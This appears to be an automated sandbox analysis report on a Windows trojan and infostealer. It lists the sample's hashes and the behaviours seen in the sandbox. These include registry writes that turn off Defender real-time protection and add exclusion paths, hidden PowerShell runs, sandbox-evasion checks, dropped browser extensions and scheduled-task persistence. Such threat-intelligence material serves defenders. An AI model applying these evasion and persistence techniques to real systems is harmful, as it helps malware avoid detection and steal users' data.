dea7ce83cf17b409453bc273ee0368909d3b1f1199fe288e70e1eb389654da7b

Analysis

max time kernel
197s
max time network
202s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
01-07-2024 05:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

dea7ce83cf17b409453bc273ee0368909d3b1f1199fe288e70e1eb389654da7b.exe
Size

7.3MB
MD5

6615f242ebbf2166bdc7c0b3058462ce
SHA1

b0e98bf7dbf59776776e72bbc821503ed0abb806
SHA256

dea7ce83cf17b409453bc273ee0368909d3b1f1199fe288e70e1eb389654da7b
SHA512

77e20f2a4748eece23e779c57b890fcc1ccec18035c31cec3512e72dfd264c2f9d883282ea1c2d329156617af90c6e0251d3c3b662f5f4ecce2becefe579fd41
SSDEEP

196608:91OOMNj3xpen8F84DGR4wtvITziBtTT6gU5:3OOIjQwrvvijH6gU5

Score

10^/10

discovery evasion execution spyware stealer trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

Processes:

reg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Windows security bypass 2 TTPs 40 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\zaBVKDgOQJLqBjiNo = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ATiuMetuMWHU2 = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\IchmcMfQaXUn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\ruCXiJvmKkuTmmIt = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\ruCXiJvmKkuTmmIt = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\ruCXiJvmKkuTmmIt = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\NonltQQlyMoZtVVB = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\UyPATDbiwjgOC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\VcCVDDBRU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\VcCVDDBRU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DcwzooFfPwZYrvRkwnR = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\NonltQQlyMoZtVVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DcwzooFfPwZYrvRkwnR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\zaBVKDgOQJLqBjiNo = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\ruCXiJvmKkuTmmIt = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ATiuMetuMWHU2 = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\UyPATDbiwjgOC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\IchmcMfQaXUn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe

Blocklisted process makes network request 1 IoCs

Processes:

rundll32.exe

flow pid process

27 1616 rundll32.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.EXEpowershell.EXEpowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exe

pid process

2320 powershell.EXE
848 powershell.EXE
888 powershell.exe
1580 powershell.EXE
1280 powershell.exe
1428 powershell.exe
2612 powershell.exe

flow	pid	process
27	1616	rundll32.exe

pid	process
2320	powershell.EXE
848	powershell.EXE
888	powershell.exe
1580	powershell.EXE
1280	powershell.exe
1428	powershell.exe
2612	powershell.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exerundll32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

aqigWbl.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Control Panel\International\Geo\Nation aqigWbl.exe
Executes dropped EXE 4 IoCs

Processes:

Install.exeInstall.exePuqtIqm.exeaqigWbl.exe

pid process

2104 Install.exe
2620 Install.exe
1968 PuqtIqm.exe
2288 aqigWbl.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Control Panel\International\Geo\Nation	aqigWbl.exe

pid	process
2104	Install.exe
2620	Install.exe
1968	PuqtIqm.exe
2288	aqigWbl.exe

Loads dropped DLL 23 IoCs

Processes:

dea7ce83cf17b409453bc273ee0368909d3b1f1199fe288e70e1eb389654da7b.exeInstall.exeInstall.exeWerFault.exerundll32.exeWerFault.exeWerFault.exe

pid	process
2060	dea7ce83cf17b409453bc273ee0368909d3b1f1199fe288e70e1eb389654da7b.exe
2104	Install.exe
2104	Install.exe
2104	Install.exe
2104	Install.exe
2620	Install.exe
2620	Install.exe
2620	Install.exe
2364	WerFault.exe
2364	WerFault.exe
2364	WerFault.exe
1616	rundll32.exe
1616	rundll32.exe
1616	rundll32.exe
1616	rundll32.exe
2472	WerFault.exe
2472	WerFault.exe
2472	WerFault.exe
2472	WerFault.exe
2472	WerFault.exe
2528	WerFault.exe
2528	WerFault.exe
2528	WerFault.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops Chrome extension 2 IoCs

Processes:

aqigWbl.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json	aqigWbl.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json	aqigWbl.exe

Drops file in System32 directory 24 IoCs

Processes:

powershell.exePuqtIqm.exepowershell.exepowershell.EXEaqigWbl.exepowershell.EXEpowershell.exepowershell.exerundll32.exepowershell.EXE

description	ioc	process
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	PuqtIqm.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	aqigWbl.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9	aqigWbl.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848	aqigWbl.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848	aqigWbl.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	PuqtIqm.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	PuqtIqm.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	aqigWbl.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199	aqigWbl.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9	aqigWbl.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	rundll32.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	PuqtIqm.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9	aqigWbl.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	aqigWbl.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199	aqigWbl.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	aqigWbl.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9	aqigWbl.exe

Drops file in Program Files directory 13 IoCs

Processes:

aqigWbl.exe

description	ioc	process
File created	C:\Program Files (x86)\ATiuMetuMWHU2\IWqLkXKbvDUqt.dll	aqigWbl.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	aqigWbl.exe
File created	C:\Program Files (x86)\VcCVDDBRU\eCQkJFh.xml	aqigWbl.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	aqigWbl.exe
File created	C:\Program Files (x86)\ATiuMetuMWHU2\COqjuWk.xml	aqigWbl.exe
File created	C:\Program Files (x86)\DcwzooFfPwZYrvRkwnR\QJXDrNj.xml	aqigWbl.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	aqigWbl.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	aqigWbl.exe
File created	C:\Program Files (x86)\IchmcMfQaXUn\fmVMaAQ.dll	aqigWbl.exe
File created	C:\Program Files (x86)\DcwzooFfPwZYrvRkwnR\bxxPlmB.dll	aqigWbl.exe
File created	C:\Program Files (x86)\UyPATDbiwjgOC\CRSpgaD.xml	aqigWbl.exe
File created	C:\Program Files (x86)\VcCVDDBRU\WLXbDq.dll	aqigWbl.exe
File created	C:\Program Files (x86)\UyPATDbiwjgOC\Ysyxcqc.dll	aqigWbl.exe

Drops file in Windows directory 4 IoCs

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	ioc	process
File created	C:\Windows\Tasks\bmQWCxleEgxbTUrSZz.job	schtasks.exe
File created	C:\Windows\Tasks\nsbPTSdSgPuDRRbhc.job	schtasks.exe
File created	C:\Windows\Tasks\RShenKKeUbJzTjI.job	schtasks.exe
File created	C:\Windows\Tasks\ROHimGgVjIIdgMKwK.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid pid_target process target process

2364 1968 WerFault.exe PuqtIqm.exe
2472 2620 WerFault.exe Install.exe
2528 2288 WerFault.exe aqigWbl.exe

pid	pid_target	process	target process
2364	1968	WerFault.exe	PuqtIqm.exe
2472	2620	WerFault.exe	Install.exe
2528	2288	WerFault.exe	aqigWbl.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exerundll32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

rundll32.exeaqigWbl.exewscript.exePuqtIqm.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9a-1d-ac-c2-a1-15	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	aqigWbl.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{85BC396E-56CE-4E7F-A676-F38F04CBFC53}\9a-1d-ac-c2-a1-15	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	aqigWbl.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{85BC396E-56CE-4E7F-A676-F38F04CBFC53}	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	aqigWbl.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9a-1d-ac-c2-a1-15\WpadDecisionTime = c0c8841675cbda01	aqigWbl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	aqigWbl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	aqigWbl.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	aqigWbl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9a-1d-ac-c2-a1-15\WpadDecision = "0"	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0120000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	aqigWbl.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9a-1d-ac-c2-a1-15	aqigWbl.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	aqigWbl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	aqigWbl.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	aqigWbl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{85BC396E-56CE-4E7F-A676-F38F04CBFC53}\WpadDecision = "0"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	aqigWbl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	aqigWbl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	aqigWbl.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	aqigWbl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	aqigWbl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PuqtIqm.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{85BC396E-56CE-4E7F-A676-F38F04CBFC53}\WpadDecisionReason = "1"	aqigWbl.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{85BC396E-56CE-4E7F-A676-F38F04CBFC53}\WpadNetworkName = "Network 3"	aqigWbl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	aqigWbl.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	aqigWbl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{85BC396E-56CE-4E7F-A676-F38F04CBFC53}\WpadDecisionReason = "1"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	aqigWbl.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	aqigWbl.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9a-1d-ac-c2-a1-15\WpadDecisionTime = e004e71b75cbda01	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings	aqigWbl.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	aqigWbl.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	aqigWbl.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	aqigWbl.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{85BC396E-56CE-4E7F-A676-F38F04CBFC53}\WpadNetworkName = "Network 3"	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9a-1d-ac-c2-a1-15\WpadDecisionReason = "1"	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	aqigWbl.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	aqigWbl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	aqigWbl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{85BC396E-56CE-4E7F-A676-F38F04CBFC53}\WpadDecision = "0"	aqigWbl.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	aqigWbl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	aqigWbl.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	aqigWbl.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000004000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0120000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	aqigWbl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	aqigWbl.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	aqigWbl.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached	PuqtIqm.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
1976	schtasks.exe
2028	schtasks.exe
2476	schtasks.exe
2780	schtasks.exe
2604	schtasks.exe
1008	schtasks.exe
2744	schtasks.exe
